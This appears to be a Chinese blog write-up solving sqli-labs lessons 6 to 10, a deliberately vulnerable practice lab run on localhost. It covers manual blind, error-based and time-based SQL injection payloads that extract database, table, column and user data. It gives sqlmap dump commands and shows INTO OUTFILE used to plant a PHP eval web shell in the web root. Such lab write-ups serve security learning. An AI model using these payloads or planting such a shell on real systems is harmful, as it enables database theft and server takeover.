sqli libs 6-10

最新推荐文章于 2024-06-05 08:30:00 发布
最新推荐文章于 2024-06-05 08:30:00 发布
阅读量125 收藏 1
点赞数
分类专栏: sql注入 文章标签: 安全漏洞 安全 web 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50688050/article/details/117321149
版权

第六关

手工注入

找到注入点

?id=1         正常
?id=1'        正常
?id=1"        错误

确定字段数量

?id=1" order by 3--+     正常
?id=1" order by 4--+     错误

说明有3个字段,而且通过页面回显我们可以看出是和第五关是一样的,所以第五关和第六关的区别就是第五关是单引号,第六关是双引号

猜解数据库名

确定数据库长度

?id=1" and length(database()) = 8 --+

确定具体的数据库名

?id=1" and ascii(substr(database(),1,1))=115--+   
?id=1" and ascii(substr(database(),2,1))=101--+
?id=1" and ascii(substr(database(),3,1))=99--+
?id=1" and ascii(substr(database(),4,1))=117--+
?id=1" and ascii(substr(database(),5,1))=114--+
?id=1" and ascii(substr(database(),6,1))=105--+
?id=1" and ascii(substr(database(),7,1))=116--+
?id=1" and ascii(substr(database(),8,1))=121--+

根据ASCII对照表,查出数据库名为security

猜解表名

确定第一个表名的长度

?id=1" and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,100))= 6--+

确定第一个表的的表名

?id=1"and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 101 --+
?id=1"and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)) = 109 --+
?id=1"and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1)) = 97 --+
?id=1"and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1)) = 105 --+
?id=1"and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1)) = 108 --+
?id=1"and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1)) = 115 --+

所以security数据库中的第一个表的名称为emails后面表的名称我就不演示了,通过修改limit后面的参数就可以爆出来,理解意思就可以了

猜解列名

确定第一列的长度

?id=1" and length(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,100))=2--+

确定第一列的列名

?id=1"and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) = 105 --+
?id=1"and ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),2,1)) = 100 --+

所以security数据库中的emails表中第一列的列名为id

猜解数据

确定数据的长度

?id=1" and length(substr((select id from security.users limit 0,1),1,100))=1--+

确定数据的具体值

?id=1" and ascii(substr((select id from security.emails limit 0,1),1,1))=49--+

所以security数据库中的emails表中第一列的列名为id的第一行数据是1

这就是一个整体的流程了,大家也可以借助burpsuit爆破来实现

SQLMAP

查询数据库名

>python3 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-6/?id=1  --technique E --dbs --batch

查询表名

python3 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-6/?id=1  --technique E -D security  --tables --batch

查询列名

python3 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-6/?id=1  --technique E -D security  -T users --columns --batch

 

 

查数据

第七关

手工注入

判断注入点

?id=1'))--+

题目是要我们写入文件,首先要有写入权限,然后还要搞清楚文件路径,

如果用的是phpstudy的话,需要在php.ini中添加secure_file_priv=""

然后我们搞一下文件路径,由于这一关页面没有回显所以只能想别的办法,但是前面的关卡中是可以回显的,而这些关卡应该是在同一目录下的所以文件目录应该也是一样的

Less-2/?id=-1 union select 1,@@basedir,@@datadir --+

phpstudy有默认路径phpStudy1\PHPTutorial\WWW,所以我们只需要找到phpstudy的文件夹在哪然后拼接起来就可以了

写入文件

?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "D:\\phpStudy1\\PHPTutorial\\WWW\\sqli\\sqli-labs-master\\ttt.php"--+

兄弟萌,这个地方多说一句一定要确定自己有写入权限,如果不知到的话可以进入数据库查询一下

查看写入文件的路径,确实已经写入了

上蚁剑!!!

 

 

第八关

手工注入

找到注入点

?id=1              正常
?id=1'             报错

发现也是盲注,大家参考第六题就可以区别就是一个是单引号一个是双引号,我自己是试过的没有问题

SQLMAP

查询当前数据库名

python3 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-8/?id=1  --technique B --current-db --batch

查询数据库中的表名

python3 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-8/?id=1  --technique B -D security --tables --batch

查询数据库中users表中的列

python3 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-8/?id=1  --technique B -D security -T users --columns --batc

查询列中的数据

python3 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-8/?id=1  --technique B -D security -T users -C password,username --dump --batch

分析源码

 

第九关

这关是时间盲注,就是不论输入什么都返回一个界面,无法通过回显来判断是否存在注入点。利用sleep()函数

判断注入点

?id=1 and slepp(5)--+

明显sleep函数并没有执行,所以sql语句闭合的不对,再试

?id=1' and sleep(5)--+

这个就是执行过le

查询数据库名

判断数据库名长度

?id=1' and if(length(database())=8,sleep(5),null)--+

猜解数据库名

?id=1' and if((substr(database(),1,1))='s',sleep(5),null)--+ 
?id=1' and if((substr(database(),2,1))='e',sleep(5),null)--+
?id=1' and if((substr(database(),3,1))='c',sleep(5),null)--+
?id=1' and if((substr(database(),4,1))='u',sleep(5),null)--+
?id=1' and if((substr(database(),5,1))='r',sleep(5),null)--+
?id=1' and if((substr(database(),6,1))='i',sleep(5),null)--+
?id=1' and if((substr(database(),7,1))='t',sleep(5),null)--+ 
?id=1' and if((substr(database(),8,1))='y',sleep(5),null)--+

查询数据库中的表名

判断数据库的第一个表名的长度

?id=1' and if(length(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,100))= 6,sleep(5),null)--+

查询数据库中第一个表名

and if(length(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,100))= 6,sleep(5),null)--+

 

后续就都差不多了,我这边就是打个样儿,要不重复性工作也太多了没有意义

SQLMAP

查询当前数据库名

python3 sqlmap.py -u http://127.0.0.1/sqli/sqli-labs-master/Less-9/?id=1  --technique T   --current-db --batch

既然能查数据库那剩下的也不成问题,由于时间盲注太慢了我就不一一演示了

 

第十关

手工注入

依然还是时间注入

?id=1 and sleep(5)--+               失败
?id=1' and sleep(5)--+              失败
?id=1" and sleep(5)--+              成功执行

猜测后台的查询语句为

select * from 表名 where id="$_id"

然后就没什么可说的了,参考第九题

鲨鱼辣椒k
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-libs------less1-less8
qq_46116117的博客
01-05 2428
sqli-libs sql注入思路 判读是否存在注入–判断注入类型–猜解字段数–查看输出字段位置–尝试爆出数据 获取数据库名–获取表名–获取列名–获取数据 less–1 页面让我们输入一个id值 我们用get的请求方式输入看看 测试这里是否有注入点 ?id=1' 出现报错情况,说明这里有注入点 判断注入类型 ?id=1' and 1=1--+ 为正常页面 ?id=1' and 1=2--+ 页面显示不正常 则为,字符型注入 猜测他的查询语句为 select *from * where ID=
Sqli-labs-master超详细通关教程(1-23关基础篇)
m0_67391270的博客
06-12 3240
一到四关主要是参数被包装的问题。一般用于尝试的语句Ps:–+可以用#替换,url 提交过程中 Url 编码后的#为%23and1=2–+'and1=2–+"and1=2–+)and1=2–+')and1=2–+")and1=2–+"))and1=2–+图中显示的sql语句是我为了方便理解,修改了源代码显示出的id =1 and 1=2页面正常,考虑是否有字符注入,先加单引号可以看到提示,存在’ '包装,我们加上–+http://127.0.0.1:8080/sqli-labs-master/Less-1/?
sql-libs(6) 双引号的报错注入
weixin_30763455的博客
08-13 178
payload:http://192.168.48.130/sqli-laaess-6/?id=1" and updatexml(1,concat(0x7e,(SELECT schema_name from information_schema.schemata limit 8,1),0x7e),1)--+ 后面就不写了 ,麻烦 转载于:https://www.cnb...
sql-lib less5-6
originalSinLow的博客
08-07 241
less-5 第一步: http://localhost/sqli/Less-5/?id=1’ 得到错误’1’’ 因此单引号闭合使用order by http://localhost/sqli/Less-5/?id=1’ order by 3–+ 得到字段数为3 第二步: 页面没有回显,进行bool盲注测试 爆破数据库: ?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1
sqli-labs靶场和phpstudy的下载与安装-2022年最新
Emmawas的博客
05-31 3453
sqli-labs靶场和phpstudy的下载与安装
sqli-labs-master靶场搭建详细过程(附下载链接)
weixin_42090431的博客
07-02 656
3、把sqli压缩包放进去解压,找到$dbpass='' 单引号里面填root 具体路径如下。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1827
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 706
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
sqli-labs-master 下载、搭建
m0_63521991的博客
01-28 1031
sqli-labs-master 是一个帮助用户学习和测试 SQL 注入漏洞的开源项目。它提供了一系列的环境,用户可以在这些环境中进行实验,学习如何检测、利用和防御 SQL 注入攻击。sqli-labs 下载地址: github.com/Audi-1/sqli-labs。
Windows搭建sqli-labs靶场(新手向)
weixin_45837672的博客
07-19 613
Windows搭建sqli-labs靶场
Sqli-labs-maste靶场的下载、配置
最新发布
weixin_68416970的博客
06-05 687
Sqli-labs-master靶场的下载、配置教程
sqli-labs关卡6(基于get提交的双引号闭合的报错注入)通关思路
zyh1588的博客
10-26 316
小白回顾sqli-labs靶场第六关
sqli-labs靶场安装
剁椒鱼头没剁椒的博客
10-22 7153
PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。Sqlilabs是一个学习sql注入的平台,GET和POST场景包括了许多基本的实验内容,例如:基于错误的注入、盲注、更新查询注入、插入查询注入、Header注入、二次注入、Bypass WAF、堆叠注入等等。
windows下sqli-labs的下载与安装
qq_54502707的博客
03-20 1291
Hello大家好,这里是KOKO师傅~ 今天带领大家搭建sqli-labs靶场! 什么是sqli-labs sqli-labs是由一名印度程序员写的,用来学习sql注入的一个闯关游戏,相当于练习用的一个靶场。 sqli-labs下载与安装 环境 apache+mysql+php Windows下可以直接用phpstudy,wamp等直接安装,Linux也有很多其他教程,本篇文章用phpstudy为基础。 phpstudy:http://phpstudy.php.cn/ sqli-labs-master:ht
webug4.0通关笔记---(第一天:布尔注入)
liver100day的博客
04-23 670
布尔注入 页面在执行sql语句后,只会显示两种结果,Tuer or False 也就意味着,它不需要报错,不需要知道准确的字段个数, 归根结底它只关心一点: 我们的sql到底有没有被执行成功 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master文件夹复制到Apache或WAMP的web目录下。 4. 在MySQL中创建一个名为“sqli-labs”的数据库,并将sqli-labs文件夹中的“db-creds.inc”文件中的用户名和密码修改为您的MySQL用户名和密码。 5. 在浏览器中访问http://localhost/sqli-labs-master/setup.php,这将创建所需的数据库表和数据。 6. 访问http://localhost/sqli-labs-master/index.html,您将看到sqli-labs的主页。 7. 点击“Lessons”链接,您将看到一系列的SQL注入漏洞测试用例,您可以选择其中的一个进行测试。 8. 在测试用例页面中,您可以看到注入点和注入语句,您可以使用工具如SQLMap等进行注入测试。 希望这个安装教程对您有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值